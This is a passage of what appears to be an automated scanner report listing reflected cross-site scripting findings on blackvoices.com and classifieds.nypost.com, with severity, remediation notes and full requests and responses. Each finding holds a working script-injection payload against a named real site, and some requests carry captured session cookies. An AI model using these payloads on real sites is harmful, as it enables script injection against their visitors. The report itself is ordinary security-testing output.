<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com19f54</script><script>alert(1)</script>6443d67beca/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternal
...[SNIP]...

1.69. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5521b</script><script>alert(1)</script>b0ec37dd172 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*5521b</script><script>alert(1)</script>b0ec37dd172/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.489352780.3882878720; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31020
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*5521b</script><script>alert(1)</script>b0ec37dd172/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.70. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ee9d</script><script>alert(1)</script>4509e38f224 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com2ee9d</script><script>alert(1)</script>4509e38f224/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240247308.3039161932.1081017600; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31020
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com2ee9d</script><script>alert(1)</script>4509e38f224/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascript:,aol.com,blackvoi
...[SNIP]...

1.71. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1afe6</script><script>alert(1)</script>825b8783c8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video1afe6</script><script>alert(1)</script>825b8783c8e HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240312844.371650124.1820198144; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:55 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31018
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm03 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video1afe6</script><script>alert(1)</script>825b8783c8e";
s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.72. http://www.classifieds.nypost.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ddde"><script>alert(1)</script>26b4242f446 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4ddde"><script>alert(1)</script>26b4242f446=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/?4ddde"><script>alert(1)</script>26b4242f446=1" />
...[SNIP]...

1.73. http://www.classifieds.nypost.com/housing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14c0d"-alert(1)-"e4e8feb3184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing14c0d"-alert(1)-"e4e8feb3184/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing14c0d"-alert(1)-"e4e8feb3184/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.74. http://www.classifieds.nypost.com/housing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86939"><script>alert(1)</script>68721ea7f0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing86939"><script>alert(1)</script>68721ea7f0d/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing86939"><script>alert(1)</script>68721ea7f0d/" />
...[SNIP]...

1.75. http://www.classifieds.nypost.com/housing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 410a9"><script>alert(1)</script>94bde877b6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/?410a9"><script>alert(1)</script>94bde877b6a=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/?410a9"><script>alert(1)</script>94bde877b6a=1" />
...[SNIP]...

1.76. http://www.classifieds.nypost.com/housing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b44"-alert(1)-"21f0db2ce7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/?d7b44"-alert(1)-"21f0db2ce7f=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/?d7b44"-alert(1)-"21f0db2ce7f=1","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.77. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6dc5"-alert(1)-"47fd84fae45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housingb6dc5"-alert(1)-"47fd84fae45/rent/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housingb6dc5"-alert(1)-"47fd84fae45/rent/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.78. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1cb0"><script>alert(1)</script>3f30dc1b8ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housinge1cb0"><script>alert(1)</script>3f30dc1b8ef/rent/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

